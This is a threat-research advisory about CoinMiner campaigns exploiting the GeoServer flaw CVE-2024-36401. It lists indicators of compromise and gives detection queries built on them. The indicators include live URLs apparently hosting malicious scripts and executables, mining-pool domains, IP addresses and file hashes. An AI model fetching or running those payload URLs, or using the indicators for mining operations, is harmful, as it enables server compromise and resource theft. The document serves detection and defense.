GeoServer, Where Various CoinMiner Attacks Occur

    Tuesday, December 30, 2025 In: Threat Research Print

    Date: 12/30/2025

    Severity: High

    Summary

    Researchers identified multiple attack campaigns abusing a GeoServer remote code execution flaw (CVE-2024-36401). The attackers indiscriminately scan the internet for exposed and vulnerable GeoServer instances. After gaining access, they install XMRig-based cryptocurrency miners on compromised servers. The payloads hijack system resources to mine cryptocurrency without authorization. Some campaigns rely on multi-stage PowerShell and Bash scripts, using certutil-based droppers and in-memory downloaders. To maintain persistence, the attackers weaken defenses by disabling security settings and adding Windows Defender exclusions.

    Indicators of Compromise (IOC) List

    Domains\URLs :

    http://119.194.153.31:8080/icon/js/config.json

    http://119.194.153.31:8080/icon/js/l.txt

    http://119.194.153.31:8080/icon/js/p.sh

    http://119.194.153.31:8080/icon/js/s.rar

    http://119.194.153.31:8080/icon/js/solrd.exe

    aaaaaaaa.cyou

    asia.aaaaaaaa.cyou

    eu.aaaaaaaa.cyou

    ssl.aaaaaaaa.cyou

    us.aaaaaaaa.cyou

    IP Address :

    104.243.43.115

    154.89.152.204

    185.208.156.197

    203.91.76.58

    Hash :

    04101ba4061732ed0716f554cb7d6539

    05fe0e7e4e181ee77749f334e2d7b10f

    1136efb1a46d1f2d508162387f30dc4d

    21c5171fb746b93913efdaac328d91bd

    2517826a165193105923233e13b418d4

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "http://119.194.153.31:8080/icon/js/p.sh" or url like "http://119.194.153.31:8080/icon/js/p.sh" or siteurl like "http://119.194.153.31:8080/icon/js/p.sh" or domainname like "http://119.194.153.31:8080/icon/js/config.json" or url like "http://119.194.153.31:8080/icon/js/config.json" or siteurl like "http://119.194.153.31:8080/icon/js/config.json" or domainname like "asia.aaaaaaaa.cyou" or url like "asia.aaaaaaaa.cyou" or siteurl like "asia.aaaaaaaa.cyou" or domainname like "eu.aaaaaaaa.cyou" or url like "eu.aaaaaaaa.cyou" or siteurl like "eu.aaaaaaaa.cyou" or domainname like "http://119.194.153.31:8080/icon/js/l.txt" or url like "http://119.194.153.31:8080/icon/js/l.txt" or siteurl like "http://119.194.153.31:8080/icon/js/l.txt" or domainname like "http://119.194.153.31:8080/icon/js/solrd.exe" or url like "http://119.194.153.31:8080/icon/js/solrd.exe" or siteurl like "http://119.194.153.31:8080/icon/js/solrd.exe" or domainname like "aaaaaaaa.cyou" or url like "aaaaaaaa.cyou" or siteurl like "aaaaaaaa.cyou" or domainname like "http://119.194.153.31:8080/icon/js/s.rar" or url like "http://119.194.153.31:8080/icon/js/s.rar" or siteurl like "http://119.194.153.31:8080/icon/js/s.rar" or domainname like "ssl.aaaaaaaa.cyou" or url like "ssl.aaaaaaaa.cyou" or siteurl like "ssl.aaaaaaaa.cyou" or domainname like "us.aaaaaaaa.cyou" or url like "us.aaaaaaaa.cyou" or siteurl like "us.aaaaaaaa.cyou"

    Detection Query 2 :

    dstipaddress IN ("154.89.152.204","104.243.43.115","185.208.156.197","203.91.76.58") or srcipaddress IN ("154.89.152.204","104.243.43.115","185.208.156.197","203.91.76.58")

    Detection Query 3 :

    md5hash IN ("05fe0e7e4e181ee77749f334e2d7b10f","21c5171fb746b93913efdaac328d91bd","1136efb1a46d1f2d508162387f30dc4d","04101ba4061732ed0716f554cb7d6539","2517826a165193105923233e13b418d4")

    Reference:

    https://asec.ahnlab.com/en/91724/


    Tags

    VulnerabilityCoin minerCVE-2024cryptocurrency

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.